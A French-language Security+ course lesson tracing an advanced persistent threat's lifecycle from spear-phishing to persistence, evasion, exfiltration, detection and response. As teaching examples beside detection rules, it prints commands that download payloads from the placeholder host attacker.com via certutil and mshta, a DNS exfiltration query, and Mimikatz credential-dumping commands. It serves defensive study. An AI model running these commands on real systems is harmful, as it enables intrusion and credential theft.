0Pricing
Security+ Academy · Leçon

Cycle de vie d’un APT : de l’accès initial à la persistance

Suivez un APT depuis l’accès initial par hameçonnage ciblé jusqu’à l’établissement du C2, l’élévation de privilèges et les mécanismes de persistance qui survivent aux redémarrages et à la réinstallation des images.

Cycle de vie d’un APT : de l’accès initial à la persistance est une leçon Security+ Academy gratuite sur CoddyKit. Ceci est la leçon 1 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Security+ Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Security+ Academy comprend 4 leçons au total.

Qu’est-ce qu’une menace persistante avancée ?

Une menace persistante avancée (APT) est une campagne de cyberattaque sophistiquée et de longue durée, généralement menée par des acteurs étatiques ou des groupes criminels disposant de moyens importants et poursuivant des objectifs stratégiques précis. Ses trois caractéristiques essentielles sont les suivantes : Advanced — elle utilise des logiciels malveillants personnalisés, des vulnérabilités de type zero-day et des techniques inédites ; Persistent — elle maintient une présence furtive pendant des mois ou des années, plutôt que de mener une opération ponctuelle ; Threat — il s’agit d’une attaque coordonnée et ciblée contre une organisation donnée. Parmi les groupes APT célèbres figurent APT28 (Fancy Bear), associé au GRU russe, APT41, associé à la Chine, et Lazarus Group, associé à la Corée du Nord.

Accès initial : comment les APT s’introduisent

Les campagnes APT commencent généralement par l’une d’un petit nombre de techniques éprouvées d’accès initial. L’hameçonnage ciblé, avec des pièces jointes piégées ou des liens destinés à dérober des identifiants, est la méthode la plus courante : le courriel semble provenir d’un collègue ou d’un partenaire de confiance. La compromission de la chaîne d’approvisionnement (comme dans SolarWinds/SUNBURST) insère du code malveillant dans des mises à jour logicielles fiables. L’exploitation de services exposés sur Internet (équipements VPN, serveurs Exchange, applications web) s’appuie sur des CVE non corrigées. Les attaques par point d’eau compromettent des sites web fréquentés par les employés de l’organisation ciblée et proposent des exploits furtifs aux visiteurs.

Exécution : lancer la première charge utile

Après avoir obtenu l’accès initial, l’attaquant doit exécuter sa première charge utile sur le système ciblé. Les APT privilégient les techniques qui se confondent avec l’activité normale du système : des macros malveillantes dans des documents Office, qui s’exécutent lorsque la victime active le contenu ; des fichiers HTML Application (HTA), qui exécutent des scripts à leur ouverture ; et les binaires Living-off-the-Land (LOLBins), qui consistent à utiliser des outils Windows légitimes comme mshta.exe, certutil.exe, regsvr32.exe ou wscript.exe pour exécuter le code de l’attaquant et contourner les listes d’autorisation des applications. Ces techniques rendent les premières charges utiles difficiles à distinguer d’une activité système légitime.

# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe

# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta

# Detection: alert on certutil/mshta with network connections

Établissement du C2 : appeler le serveur distant

Une fois la première charge utile exécutée, elle établit un canal de commande et contrôle (C2) vers l’infrastructure de l’attaquant. Les C2 modernes des APT utilisent des techniques conçues pour échapper à la détection : le HTTPS vers des domaines sosies qui imitent des services cloud légitimes (Teams, OneDrive, GitHub) ; le tunneling DNS, qui consiste à encoder des commandes dans des requêtes d’enregistrements TXT DNS semblant constituer un trafic DNS normal ; les algorithmes de génération de domaines (DGA), qui produisent chaque jour un nouveau domaine C2 à partir d’une graine, rendant le blocage des domaines inefficace ; et le C2 Living-off-the-Land, qui utilise des plateformes cloud légitimes (API Slack, Google Sheets, Twitter) comme canal de communication.

# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)

# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)

Découverte : cartographier l’environnement

Après avoir établi le C2, les acteurs APT effectuent une reconnaissance interne afin de comprendre l’environnement avant de poursuivre leur progression. Cette étape comprend : l’énumération d’Active Directory à l’aide d’outils comme BloodHound pour cartographier les relations de confiance et identifier les cibles de grande valeur ; l’analyse du réseau pour repérer les hôtes actifs, les services et les ports ouverts ; la recherche d’identifiants dans les systèmes de fichiers, les fichiers de configuration, les bases de mots de passe ou les identifiants enregistrés dans les navigateurs ; et l’énumération des identités pour identifier les comptes privilégiés, les comptes de service et les postes de travail d’administration. La plupart des activités de découverte utilisent les outils Windows natifs (net user /domain, ipconfig, nltest) afin d’éviter la détection.

# Native Windows commands used by APTs for discovery
# net user /domain                    # list domain users
# net group 'Domain Admins' /domain   # list domain admins
# ipconfig /all                       # network configuration
# netstat -ano                        # active network connections
# tasklist /v                         # running processes

Élévation de privilèges : obtenir les droits d’administration

Les APT obtiennent généralement un accès initial avec des identifiants utilisateur limités et doivent élever leurs privilèges pour atteindre leurs objectifs. Les voies d’élévation courantes comprennent : le vol d’identifiants en mémoire à l’aide de Mimikatz (extraction des hachages NTLM de la mémoire du processus LSASS) ; le Kerberoasting (demande de tickets de service pour les comptes de service, puis cassage hors ligne) ; l’exploitation de services mal configurés disposant d’autorisations faibles (chemins non sécurisés vers les binaires de service, détournement de DLL) ; et l’usurpation de jeton pour voler le jeton d’authentification d’un processus privilégié. Les techniques de contournement du contrôle de compte d’utilisateur (UAC) permettent de passer d’un compte d’administration standard à SYSTEM sans déclencher d’invite UAC.

# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords

# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS process

Mécanismes de persistance : survivre aux redémarrages

Les APT investissent beaucoup dans des mécanismes de persistance capables de survivre aux redémarrages et à la réinstallation des images, car l’accès initial a pu être difficile et coûteux à obtenir. Techniques courantes de persistance sous Windows : les clés d’exécution du Registry (HKLM\Software\Microsoft\Windows\CurrentVersion\Run) ; les tâches planifiées qui exécutent régulièrement des logiciels malveillants ; les services Windows qui démarrent automatiquement ; les abonnements aux événements WMI (difficiles à détecter et capables de survivre à la plupart des opérations de nettoyage) ; le détournement de l’ordre de recherche des DLL ; et les implants d’amorçage ou antérieurs au système d’exploitation (implants de micrologiciel UEFI qui survivent aux réinstallations de l’OS, utilisés par l’Equation Group et des acteurs liés à la NSA).

# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services

# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'

Évasion des défenses : se fondre dans le décor

Les APT mettent en œuvre une vaste évasion des défenses pour éviter d’être détectées par les outils de sécurité des terminaux et les analystes. Les techniques comprennent : l’injection de processus — injecter du code malveillant dans des processus légitimes comme explorer.exe ou svchost.exe, afin que le logiciel malveillant s’exécute sous le nom d’un processus approuvé ; la falsification des dates de fichiers — modifier les horodatages des fichiers pour donner l’impression que les fichiers malveillants existent depuis des années ; la suppression et la falsification des journaux — effacer les journaux d’événements Windows pour supprimer les preuves ; l’utilisation abusive de certificats de signature de code — signer les logiciels malveillants avec des certificats légitimes volés ; et l’exécution en mémoire (logiciel malveillant sans fichier), qui n’écrit jamais sur le disque, là où les AV fondés sur les fichiers pourraient le détecter.

Exfiltration : voler des données en toute discrétion

Les APT gèrent soigneusement l’exfiltration de données pour éviter de déclencher les contrôles DLP et la détection des anomalies de bande passante. Les techniques comprennent : la préparation des données — rassembler les données ciblées dans une archive chiffrée avant de les exfiltrer par petites quantités pendant plusieurs jours ; l’exfiltration par HTTPS vers des services de stockage en nuage (OneDrive, service de dépôt de fichiers) autorisés par les règles du pare-feu de l’entreprise ; la stéganographie — dissimuler des données dans des fichiers image ; et l’exfiltration à des heures choisies pendant les heures de travail, afin de se fondre dans le trafic légitime. Les APT n’exfiltrent que ce dont elles ont besoin (propriété intellectuelle de grande valeur, identifiants, plans stratégiques) au lieu de tout copier en masse, ce qui réduit leur empreinte et la probabilité de détection.

Détecter l’activité des APT : indicateurs clés

La détection des APT exige d’aller au-delà des alertes individuelles pour identifier des schémas d’activité associés tout au long de la chaîne d’attaque. Les principaux indicateurs comprennent : des relations inhabituelles entre processus parents et enfants (par exemple, Word lançant PowerShell) ; des commandes PowerShell encodées ou des téléchargements depuis Internet ; des tâches planifiées ou des services créés à des heures inhabituelles ; un accès à la mémoire de LSASS par des processus qui ne sont pas des processus système ; des déplacements latéraux via SMB ou WMI depuis des postes de travail ; et des requêtes DNS sortantes inhabituelles avec des sous-domaines très longs. Le navigateur MITRE ATT&CK permet aux défenseurs de mettre en correspondance les techniques détectées avec la matrice ATT&CK et de repérer les lacunes de leur couverture de détection.

# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLine

Réponse aux APT : contenir la menace sans donner l’alerte

Répondre à une APT active exige de trouver un équilibre délicat : contenir la menace sans alerter l’attaquant. Une contention prématurée (bloquer le trafic C2, désactiver des comptes) peut pousser l’APT à activer des charges utiles destructrices ou à accélérer l’exfiltration. Les bonnes pratiques comprennent : surveiller discrètement tout en recueillant des renseignements ; segmenter progressivement les hôtes infectés à l’aide de règles de pare-feu sans bloquer le C2 ; déployer des technologies de déception (jetons leurres, comptes canaris) pour surveiller l’activité de l’attaquant ; et coordonner les actions avec les forces de l’ordre avant toute mesure importante de contention. Une remédiation complète exige d’identifier tous les mécanismes de persistance et les comptes compromis : un seul implant oublié suffit pour que l’attaquant revienne.

Vérification rapide

Vérifiez votre compréhension des concepts de CompTIA Security+ (SY0-701) abordés dans cette leçon.

Récapitulatif de la leçon

Dans cette leçon, vous avez appris que : les APT sont des campagnes avancées, persistantes et ciblées, qui opèrent généralement pendant des mois en utilisant l’hameçonnage ciblé, des attaques de la chaîne d’approvisionnement ou l’exploitation de vulnérabilités pour obtenir un accès initial ; les APT utilisent des LOLBins et des services légitimes en nuage pour leur C2, afin de se fondre dans le trafic normal et d’échapper à la détection ; et les mécanismes de persistance vont des clés d’exécution du Registre aux implants de micrologiciel UEFI, les abonnements WMI étant particulièrement difficiles à détecter et à supprimer. Nous allons maintenant étudier les techniques de déplacement latéral, notamment Pass-the-Hash et Pass-the-Ticket.

Questions Fréquemment Posées

La leçon « Cycle de vie d’un APT : de l’accès initial à la persistance » est-elle gratuite ?

Oui — le texte complet de « Cycle de vie d’un APT : de l’accès initial à la persistance » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Security+ Academy, passe à CoddyKit PRO. Le cours Security+ Academy comprend 4 leçons au total.

Qu'est-ce que j'apprendrai dans « Cycle de vie d’un APT : de l’accès initial à la persistance » ?

Suivez un APT depuis l’accès initial par hameçonnage ciblé jusqu’à l’établissement du C2, l’élévation de privilèges et les mécanismes de persistance qui survivent aux redémarrages et à la réinstallat… Tu pratiques Security+ Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.

Dois-je avoir de l'expérience pour commencer Security+ Academy ?

Aucune expérience préalable n'est requise. Security+ Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 1 sur 4.

Combien de temps prend la leçon « Cycle de vie d’un APT : de l’accès initial à la persistance » ?

La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.

Peux-tu écrire et exécuter du code dans cette leçon Security+ Academy ?

Oui. Chaque leçon Security+ Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.

Toutes les leçons de ce cours

  1. Cycle de vie d’un APT : de l’accès initial à la persistance
  2. Déplacement latéral : Pass-the-Hash et Pass-the-Ticket
  3. Kerberoasting et attaques par Golden Ticket
  4. Cadre MITRE ATT&CK pour la détection et la réponse
← Retour à Security+ Academy